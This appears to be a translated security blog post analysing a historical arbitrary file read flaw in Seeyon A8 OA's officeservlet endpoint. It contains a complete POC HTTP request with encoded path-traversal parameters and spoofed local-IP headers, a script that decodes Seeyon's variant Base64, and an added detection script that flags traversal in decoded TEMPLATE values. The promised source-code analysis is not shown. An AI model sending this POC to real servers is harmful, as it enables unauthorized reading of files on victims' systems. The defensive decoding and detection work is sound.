I. Preface
Recently I obtained the Seeyon (致远) source code from another researcher for analysis, and thought I would use it to do a reasonably careful walk-through of a historical vulnerability.
Here I pick the Seeyon A8 arbitrary file read vulnerability and analyze it against the source. First, the exploit POC is as follows:
POST /seeyon/officeservlet HTTP/1.1
Host: xxxx
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=98FCAEBB95CCBEB2C7209BEF7EAA7B3E; loginPageURL=
x-forwarded-for: 127.0.0.1
x-originating-ip: 127.0.0.1
x-remote-ip: 127.0.0.1
x-remote-addr: 127.0.0.1
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 350

DBSTEP V3.0 285 0 0
RECORDID=wLoi
CREATEDATE=wLehP4whzUoiw=66
originalFileId=wLoi
needReadFile=yRWZdAS6
originalCreateDate=wLehP4whzUoiw=66
OPTION=LKDxOWOWLlxwVlOW
TEMPLATE=qf85qf85qfDfeazQqAzvcRevy1W3eazvNaMUySz3d7TsdRDsyaM3nYli
COMMAND=BSTLOlMSOCQwOV66
affairMemberId=wLoi
affairMemberName=wLoi
II. Vulnerability Analysis
First, look at the request body above: the parameter values are transmitted in an obfuscated form. This is Seeyon's own variant of Base64, which uses a shuffled alphabet in place of the standard one; for the detailed decoding method see kk's article "Encoding and decoding the Seeyon OA variant Base64 algorithm" (致远 OA 变种 BASE64 算法的加解密方法, https://paper.seebug.org/964/).
Here is a decoding script. It can only be used to decode request parameters; it cannot decrypt database password ciphertext.
import base64

# Seeyon's custom Base64 alphabet
a = "gx74KW1roM9qwzPFVOBLSlYaeyncdNbI=JfUCQRHtj2+Z05vshXi3GAEuT/m8Dpk6"
# The standard Base64 alphabet (same length, paired position by position)
b = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="


# Convert a string in the custom Base64 alphabet to standard Base64
def custom_to_standard(custom_base64_str):
    standard_base64_str = ""
    # Build the character mapping dictionary
    custom_to_standard_map = {ca: cb for ca, cb in zip(a, b)}
    for char in custom_base64_str:
        # Look up the standard Base64 character for this custom character;
        # characters outside the alphabet are passed through unchanged
        standard_base64_str += custom_to_standard_map.get(char, char)
    return standard_base64_str


# Decode a request parameter: translate to standard Base64, then Base64-decode
def decode(custom_base64_str):
    return base64.b64decode(custom_to_standard(custom_base64_str)).decode("utf-8", errors="replace")


if __name__ == "__main__":
    # e.g. the RECORDID value from the POC above
    print(decode("wLoi"))
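The script below is an added example, not code from the original post or from Seeyon. It takes the defender's side of the same decoding: it parses the DBSTEP body of the POC above into header fields and key=value parameters, decodes every value with the same variant alphabet, and flags a LOADTEMPLATE request whose TEMPLATE value contains a ".." path segment, which is the check a WAF rule or a log-review script would apply to officeservlet traffic. The sample body is a constructed copy of the one in the POC; the token-based parsing of the body, the function names and the encode_value helper (used only to build benign test input) are assumptions.

```python
import base64
import re

# Seeyon's variant Base64 alphabet (as given in the post) and the standard
# alphabet, paired position by position; the two translation tables map
# between them in either direction.
SEEYON_ALPHABET = "gx74KW1roM9qwzPFVOBLSlYaeyncdNbI=JfUCQRHtj2+Z05vshXi3GAEuT/m8Dpk6"
STANDARD_ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="
TO_STANDARD = str.maketrans(SEEYON_ALPHABET, STANDARD_ALPHABET)
TO_SEEYON = str.maketrans(STANDARD_ALPHABET, SEEYON_ALPHABET)

# Constructed sample: the DBSTEP body from the POC above, as whitespace-separated
# tokens (header fields first, then key=value parameters).
SAMPLE_BODY = (
    "DBSTEP V3.0 285 0 0 "
    "RECORDID=wLoi CREATEDATE=wLehP4whzUoiw=66 originalFileId=wLoi "
    "needReadFile=yRWZdAS6 originalCreateDate=wLehP4whzUoiw=66 "
    "OPTION=LKDxOWOWLlxwVlOW "
    "TEMPLATE=qf85qf85qfDfeazQqAzvcRevy1W3eazvNaMUySz3d7TsdRDsyaM3nYli "
    "COMMAND=BSTLOlMSOCQwOV66 affairMemberId=wLoi affairMemberName=wLoi"
)

# Matches a ".." path segment at the start, at the end, or between separators.
TRAVERSAL = re.compile(r"(^|[\\/])\.\.($|[\\/])")


def decode_value(token):
    """Translate a variant-alphabet token to standard Base64 and decode it."""
    standard = token.translate(TO_STANDARD)
    return base64.b64decode(standard).decode("utf-8", errors="replace")


def encode_value(text):
    """Inverse of decode_value (assumed helper); used here to build benign test bodies."""
    standard = base64.b64encode(text.encode("utf-8")).decode("ascii")
    return standard.translate(TO_SEEYON)


def parse_dbstep_body(body):
    """Split a DBSTEP body into (header_tokens, {param: decoded_value}).

    Tokens before the first key=value pair are header fields. Values are split
    on the first '=' only, because '=' is itself a symbol of the variant
    alphabet and can appear inside an encoded value (see CREATEDATE above).
    """
    header, params = [], {}
    for tok in body.split():
        if "=" in tok[1:]:
            key, _, value = tok.partition("=")
            params[key] = decode_value(value)
        elif not params:
            header.append(tok)
    return header, params


def audit_officeservlet_body(body):
    """Defender-side check: decode the body and report a LOADTEMPLATE request
    whose TEMPLATE value tries to leave the template directory."""
    header, params = parse_dbstep_body(body)
    findings = []
    template = params.get("TEMPLATE", "")
    if params.get("OPTION") == "LOADTEMPLATE" and TRAVERSAL.search(template):
        findings.append("path traversal in TEMPLATE: " + template)
    return {"header": header, "params": params, "findings": findings}


if __name__ == "__main__":
    result = audit_officeservlet_body(SAMPLE_BODY)
    for key, value in result["params"].items():
        print("%-20s %s" % (key, value))
    for finding in result["findings"]:
        print("ALERT:", finding)
```

Run it on the sample body and the decoded OPTION/COMMAND pair (LOADTEMPLATE / INSERTFILE) plus the flagged TEMPLATE value show why a plain string match on the raw request misses this traffic: the ".." never appears on the wire, so any detection has to decode the variant alphabet first.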
This article represents the author's independent views and may not be reproduced without permission; for authorization contact FreeBuf customer service (Xiaomifeng), WeChat: freebee2022